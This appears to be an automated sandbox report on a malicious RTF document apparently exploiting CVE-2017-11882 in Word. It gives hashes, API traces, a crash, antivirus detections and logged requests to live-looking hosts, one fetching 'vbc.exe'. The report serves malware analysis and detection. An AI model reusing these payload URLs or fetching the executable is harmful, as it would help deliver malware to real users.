Summary | ZeroBOX

.............................................................dot

Category FILE
Machine s1_win7_x6402
Started April 13, 2021, 9:13 a.m.
Completed April 13, 2021, 9:21 a.m.
Size 8.7KB
Type Rich Text Format data, unknown version
MD5 e70135cdb555ce99adee7df642813dcb
SHA256 8fd53e5f78693bc7639c94ef4a7969c5395c4e90ae255c0080f687811c8339e6
CRC32 71D3C636
ssdeep 192:v+5wk2b/9LmQCx4ZesrJHUf9i5Lt8cAKIG4BrNAorM:Giz9aQCC3tD+5AoA
Yara
  • Rich_Text_Format_Zero - Rich Text Format Signature Zero

IP Address Status Action

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

__exception__

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706be
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 3689032
registers.edi: 1957755408
registers.eax: 3689032
registers.ebp: 3689112
registers.edx: 0
registers.ebx: 4712380
registers.esi: 2147944126
registers.ecx: 3350582440
1 0 0

__exception__

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706ba
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 3688724
registers.edi: 1957755408
registers.eax: 3688724
registers.ebp: 3688804
registers.edx: 0
registers.ebx: 4711876
registers.esi: 2147944122
registers.ecx: 3350582440
1 0 0
suspicious_features Connection to IP address suspicious_request GET http://23.95.122.25/h/vbc.exe
suspicious_features GET method with no useragent header suspicious_request GET http://www.ueoxx.com/nnmd/?uZi0=tRQiX2tnIcR1+0C/rREkw+oZ8fYp7zrYt8/OoSFyZqkjizznZx3g6RXGoToit+qONbwCpa2o&Vnt4_=GTd0sn7PSL8x7PP
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 3332
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05fe1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3332
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x743c1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3332
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05830000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3332
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05840000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3332
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05850000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3332
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70b41000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3332
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70b44000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3332
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x507c1000
process_handle: 0xffffffff
1 0 0
Application Crash Process WINWORD.EXE with pid 3332 crashed
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x000003e4
filepath: C:\Users\test22\AppData\Local\Temp\~$...........................................................dot
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$...........................................................dot
create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0
filetype_details Rich Text Format data, unknown version filename .............................................................dot
host 172.217.25.14
host 23.95.122.25
MicroWorld-eScan Exploit.RTF-ObfsObjDat.Gen
FireEye Exploit.RTF-ObfsObjDat.Gen
CAT-QuickHeal Exp.RTF.Obfus.Gen
McAfee Exploit-CVE2017-11882.bw
Arcabit Exploit.RTF-ObfsObjDat.Gen
Symantec Trojan.Gen.MBT
ESET-NOD32 a variant of DOC/Abnormal.A
BitDefender Exploit.RTF-ObfsObjDat.Gen
NANO-Antivirus Exploit.Rtf.Heuristic-rtf.dinbqn
Ad-Aware Exploit.RTF-ObfsObjDat.Gen
Emsisoft Exploit.RTF-ObfsObjDat.Gen (B)
TrendMicro HEUR_RTFMALFORM
McAfee-GW-Edition Exploit-CVE2017-11882.bw
Ikarus Win32.Outbreak
Avira HEUR/Rtf.Malformed
GData Exploit.RTF-ObfsObjDat.Gen
Cynet Malicious (score: 99)
AhnLab-V3 RTF/Malform-A.Gen
ALYac Exploit.RTF-ObfsObjDat.Gen
MAX malware (ai score=83)
Zoner Probably Heur.RTFBadVersion
TACHYON Trojan-Exploit/RTF.CVE-2017-11882
Fortinet RTF/CoinMiner.N!tr